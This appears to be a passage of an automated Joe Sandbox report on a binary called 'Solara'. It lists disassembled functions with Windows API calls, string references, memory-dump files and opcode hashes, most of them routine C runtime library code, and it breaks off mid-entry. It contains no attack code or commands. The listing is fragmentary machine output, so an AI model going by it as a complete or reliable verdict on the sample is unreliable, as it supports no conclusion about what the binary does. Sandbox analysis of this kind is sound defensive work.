Opcode ID: 6e31e954573786513210bf2cf2ed841cf29262725e7d145fc8f05673e1e83807
Instruction ID: 4cea316a26b5e2a61791185d52967109da83c3e792a203698ea55310100e361e
Opcode Fuzzy Hash: 6e31e954573786513210bf2cf2ed841cf29262725e7d145fc8f05673e1e83807
Instruction Fuzzy Hash: 7721E735A01226BBCB21AB65DC45BAE376CDF437ACB150120F915A72E0D730EE00C7E8

Function 00C92299 Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 00C92448

Part of subcall function 00C8C634: HeapAlloc.KERNEL32(00000000,00000000,?,?,00C50194,?,?,?,?,?,00C211DC,?,00000001), ref: 00C8C666

__freea.LIBCMT ref: 00C9245D
__freea.LIBCMT ref: 00C9246D

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __freea$AllocHeap
String ID:
API String ID: 85559729-0
Opcode ID: d1e45c2c2d3627137541ebe8eaf421375f50eee41e7c2357763f92a6ed27e731
Instruction ID: d52121016a075eef0f24beefbf6d8840f1ee58ad29638c8734eb00606b6d1cc4
Opcode Fuzzy Hash: d1e45c2c2d3627137541ebe8eaf421375f50eee41e7c2357763f92a6ed27e731
Instruction Fuzzy Hash: A951D272600216BFEF219FA5CC89EBF3AA9EF04354B154128FDA8D6151EB34CE1197A0

Function 00C86DA1 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00C86F16,?,00C86D9B,00000000,?,?,00C86F16,18400EB0,?,00C86F16), ref: 00C86DB2
TerminateProcess.KERNEL32(00000000,?,00C86D9B,00000000,?,?,00C86F16,18400EB0,?,00C86F16), ref: 00C86DB9
ExitProcess.KERNEL32 ref: 00C86DCB

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 61b18907338f2264863295e91a76ebce47cefb15dd2204d3020c004cc7b4e903
Instruction ID: 89e2f9ef40bcec13d565be95eef368ca524e17e18638a362c2a36ce37306c014
Opcode Fuzzy Hash: 61b18907338f2264863295e91a76ebce47cefb15dd2204d3020c004cc7b4e903
Instruction Fuzzy Hash: 92D09E31000108BBCF013FA5DD0EA9E3F26EF45389B044011BD494B071DB359955AB44

Function 00C966E1 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C96193: GetOEMCP.KERNEL32(00000000,?,?,?), ref: 00C961BE

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00C964C6,?,00000000,?,?), ref: 00C96742
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C964C6,?,00000000,?,?), ref: 00C96784

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: b0b15f3cca13dd0700b0fabde8ee9c3e89b02c6b0389eb814c8b5938a9e9765e
Instruction ID: 9943da8e17a9df916582c752f8329158df7a50654c5c2fa95118f8cda0c1581e
Opcode Fuzzy Hash: b0b15f3cca13dd0700b0fabde8ee9c3e89b02c6b0389eb814c8b5938a9e9765e
Instruction Fuzzy Hash: B4512470E003459EDF21CF75C8996AEBBF4FF85304F14456ED0A68B2D2E6749A46CB90

Function 00C8BF5F Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00CA30A8,-00000050,00000001,?,00000001,00000000,00000100,00000000,00000000,00000000,00000100,?,00CA0136,?,00000100), ref: 00C8BF93
LCMapStringW.KERNEL32(00000000,-00000050,00000000,00000001,?,00000001,00000000,00000100,00000001,?,00CA30A8,-00000050,00000001,?,00000001,00000000), ref: 00C8BFB1

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 74b35c5363b582bd204292e36bd3f60bb8464273bd94a8a7099a6684756394ca
Instruction ID: b0f947c67a9e005bb7fc912d7b9c877e7fe5151d200d50cc09ab6cbf371b393a
Opcode Fuzzy Hash: 74b35c5363b582bd204292e36bd3f60bb8464273bd94a8a7099a6684756394ca
Instruction Fuzzy Hash: 0AF0643640421ABBCF126F90DC05AEE7F26EB483A8F058010FA1866020CB32C972EB94

Function 00C96283 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,00C964D2,00C964C6,00000000), ref: 00C962B5

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 19838b024bab080dbc3dc435e25bcd28b0a766db960b21052ec8fb8e9d982da2
Instruction ID: d8532c4fd748fcb4ea55a4a7d588380d4a27fd3f9a6d40107355c12174f56d5b
Opcode Fuzzy Hash: 19838b024bab080dbc3dc435e25bcd28b0a766db960b21052ec8fb8e9d982da2
Instruction Fuzzy Hash: 345137715042589ADF218F68CD88BEA7BB8FB45304F2405EDE5EAD71D2C235AE46DF20

Function 00C8B8A4 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97f066dd7d04f53f9812eb82eb62ad983783b4a777ba0363fddcc750294c3326
Instruction ID: 10f644267b7847c16330593b96fc1d1b05fd52aa2de908fbf8861d546676db00
Opcode Fuzzy Hash: 97f066dd7d04f53f9812eb82eb62ad983783b4a777ba0363fddcc750294c3326
Instruction Fuzzy Hash: 5D0145336002156F9B11AE6AEC40B6E33B6FB84338B288125FA15DB184DB34CC028395

Non-executed Functions

Function 00C56A58 Relevance: 46.7, APIs: 25, Strings: 1, Instructions: 1201COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00C56AA6
operator+.LIBVCRUNTIME ref: 00C56AC0
DName::operator+.LIBCMT ref: 00C56BEE
DName::operator+.LIBCMT ref: 00C56C0B

Part of subcall function 00C57E24: DName::DName.LIBVCRUNTIME ref: 00C57E67

DName::operator+.LIBCMT ref: 00C56CBF
DName::operator+.LIBCMT ref: 00C56CCE

Part of subcall function 00C5C4D1: DName::operator+.LIBCMT ref: 00C5C515
Part of subcall function 00C5C4D1: DName::operator+.LIBCMT ref: 00C5C521
Part of subcall function 00C5C4D1: DName::operator+.LIBCMT ref: 00C5C59C
Part of subcall function 00C5C4D1: DName::operator+=.LIBCMT ref: 00C5C5DF

DName::operator+.LIBCMT ref: 00C56C5A

Part of subcall function 00C56816: DName::operator=.LIBVCRUNTIME ref: 00C56837

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

Part of subcall function 00C58520: shared_ptr.LIBCMT ref: 00C585C6

DName::operator+.LIBCMT ref: 00C57238
DName::operator+.LIBCMT ref: 00C57254
DName::operator+.LIBCMT ref: 00C574F3

Part of subcall function 00C566AD: DName::operator+.LIBCMT ref: 00C566CE

Strings

/, xrefs: 00C5739C

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::shared_ptr$Name::operator+=Name::operator=operator+
String ID: /
API String ID: 848932493-2043925204
Opcode ID: 67722643d8f3a166ef9f24f051cbe60c9525d152f4c390133510f69dd3e8e270
Instruction ID: 710eb7d292c46dd65e4a7a15c3a35d8abcedd13bd40e33fc135c2fda80c97680
Opcode Fuzzy Hash: 67722643d8f3a166ef9f24f051cbe60c9525d152f4c390133510f69dd3e8e270
Instruction Fuzzy Hash: FE92A2BAE145099BDF14DEA8DC81BED77A4EB18341F444239F912E7280EB38D9CC9B14

Function 00CD98B0 Relevance: 21.4, Strings: 16, Instructions: 1408COMMON

Download Yara Rule

Strings

7654, xrefs: 00CD9B47
4, xrefs: 00CD9DA1
+*)$, xrefs: 00CD9B7E
"5, xrefs: 00CDA8DD
SRQP, xrefs: 00CD9B94
d, xrefs: 00CDAB20
HKJM, xrefs: 00CD9CD0
'&%$, xrefs: 00CD9B73
[NC, xrefs: 00CD9BAA
.sq, xrefs: 00CDA9FC
tk, xrefs: 00CDAA0C
>)kf, xrefs: 00CD9B3C
x{zU, xrefs: 00CD9CFC
zvF4, xrefs: 00CD9DC0
;=3F, xrefs: 00CD9AEF
(, xrefs: 00CDA3EA

Memory Dump Source

Source File: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: "5$'&%$$($+*)$$.sq$4$7654$;=3F$>)kf$HKJM$SRQP$[NC$d$tk$x{zU$zvF4
API String ID: 0-4049772501
Opcode ID: 1b32e8b7353a4913e2376804d1093fd9a651120e3cb4f286d2a2a0d6a8707b88
Instruction ID: 99788ae5969dd48e436aad34aab1c04caa0d23bc85b40ef118f1abd1ab264e80
Opcode Fuzzy Hash: 1b32e8b7353a4913e2376804d1093fd9a651120e3cb4f286d2a2a0d6a8707b88
Instruction Fuzzy Hash: 0BA2B2716083818BD725CF25C8917ABBBE2EFD6304F18892EE2D98B391D7758505CB53

Function 00C9CA4C Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00C9CC30

Strings

1#IND, xrefs: 00C9CB51
1#QNAN, xrefs: 00C9CB5F
1#INF, xrefs: 00C9CB82
1#SNAN, xrefs: 00C9CB58

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e3e9985c31a512b722f53342cac2e1b2b43c3fbf3bc6345f0137b8972f0d571f
Instruction ID: af8f247f01f1b33ca48bec165175e5a2605cbe10d619fbd2a7deab92957a04eb
Opcode Fuzzy Hash: e3e9985c31a512b722f53342cac2e1b2b43c3fbf3bc6345f0137b8972f0d571f
Instruction Fuzzy Hash: 82D21872E082288FDF65CE28DD447EAB7B5EB44305F1445EAD41EE7240EB78AE858F41

Function 00C9A13A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00C9A458,00000002,00000000,?,?,?,00C9A458,?,00000000), ref: 00C9A1D3
GetLocaleInfoW.KERNEL32(?,20001004,00C9A458,00000002,00000000,?,?,?,00C9A458,?,00000000), ref: 00C9A1FC
GetACP.KERNEL32(?,?,00C9A458,?,00000000), ref: 00C9A211

Strings

ACP, xrefs: 00C9A158
OCP, xrefs: 00C9A18E

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c13cc2fc2c6318ff48920d291ed4d57432b087c0797f97119463ddf64212ed9a
Instruction ID: 30f9b2e15982630d3c85da08360b3796da069a917ea4b741abb49dc8b2a9328c
Opcode Fuzzy Hash: c13cc2fc2c6318ff48920d291ed4d57432b087c0797f97119463ddf64212ed9a
Instruction Fuzzy Hash: 5D21D032700100EADF348B59C90DBEB73A6EB54B64F268064E91AC7114E732DF41C3D2

Function 00C9A30F Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C9A41B
IsValidCodePage.KERNEL32(00000000), ref: 00C9A464
IsValidLocale.KERNEL32(?,00000001), ref: 00C9A473
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C9A4BB
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C9A4DA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 4df5158c950ece6ed3241921873dbfcab83ce127f9909c3147d55656a9abba29
Instruction ID: 221abd17209a55c0bcba106ff2e720dc7201fe834e42032873d24599abda109c
Opcode Fuzzy Hash: 4df5158c950ece6ed3241921873dbfcab83ce127f9909c3147d55656a9abba29
Instruction Fuzzy Hash: C8519472A00215AFEF10DFA5DC49BBE77B8FF09704F044469E911E7150E7B0DA409BA2

Function 00C9998D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

GetACP.KERNEL32(?,?,?,?,?,?,00C87E68,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C99A4E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C87E68,?,?,?,00000055,?,-00000050,?,?), ref: 00C99A79
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C99BDC

Strings

utf8, xrefs: 00C99B4B

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 576d46be85a14279a47d88b2268d2d4e3820bead54b6eabf436fa272f73ce471
Instruction ID: 6d087a07019995ce5778b7f126422df34d1d0cf06729d86bd032dc5c5cc0ae3b
Opcode Fuzzy Hash: 576d46be85a14279a47d88b2268d2d4e3820bead54b6eabf436fa272f73ce471
Instruction Fuzzy Hash: 2C710631A00202ABDF34AB7DDC4ABAA73A8EF09704F14452DF516D7181EB74EE40E761

Function 00C8C87D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C8C90A

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f4b51cc27617dd1a9908e6e09fb06f3a888ed0c03173de6cc8fe73929cf5c08f
Instruction ID: 10d28ef51d871c0cfbf160a49529b15cbc8c37aee04c475475cad027a4b671b1
Opcode Fuzzy Hash: f4b51cc27617dd1a9908e6e09fb06f3a888ed0c03173de6cc8fe73929cf5c08f
Instruction Fuzzy Hash: CDB18C32D042459FDB15EF68C8C2BFEBBA5EF55318F1481A6E854AB341D2349E01DBB8

Function 00C95854 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00C958EF
FindNextFileW.KERNEL32(00000000,?), ref: 00C9596A
FindClose.KERNEL32(00000000), ref: 00C9598C
FindClose.KERNEL32(00000000), ref: 00C959AF

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 39bf6c042c88a3567e4a91bf179d04a68456a117f412837ac67d02f0b61f157d
Instruction ID: 686199981b3245e2f78a08c24303c345fba505520a15b27a128d3ef642df35ca
Opcode Fuzzy Hash: 39bf6c042c88a3567e4a91bf179d04a68456a117f412837ac67d02f0b61f157d
Instruction Fuzzy Hash: CD41E471900A29AFEF22EF64CC8DABEB7B9EB85324F044195E415D7180E6309F818B60

Function 00C4FD68 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C4FD74
IsDebuggerPresent.KERNEL32 ref: 00C4FE40
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C4FE59
UnhandledExceptionFilter.KERNEL32(?), ref: 00C4FE63

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 7a3c2812131c6db9edf0a2825a262fb477e23a18d828ac8b1122f489d974396a
Instruction ID: 8eaf1bf8f254120ec18c4adccbf8836a2232de01020390aca7f1a0ec2b321987
Opcode Fuzzy Hash: 7a3c2812131c6db9edf0a2825a262fb477e23a18d828ac8b1122f489d974396a
Instruction Fuzzy Hash: 6D31F475D05228DBDF21EFA4D849BCDBBB8BF08304F1041AAE40DAB250EB709A859F45

Function 00C22093 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00C23EFF: __EH_prolog3_catch.LIBCMT ref: 00C23F06

Part of subcall function 00C23E3B: __EH_prolog3_catch.LIBCMT ref: 00C23E42

_Deallocate.LIBCONCRT ref: 00C2226E
_Deallocate.LIBCONCRT ref: 00C222BB

Strings

Current val: %d, xrefs: 00C22247

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
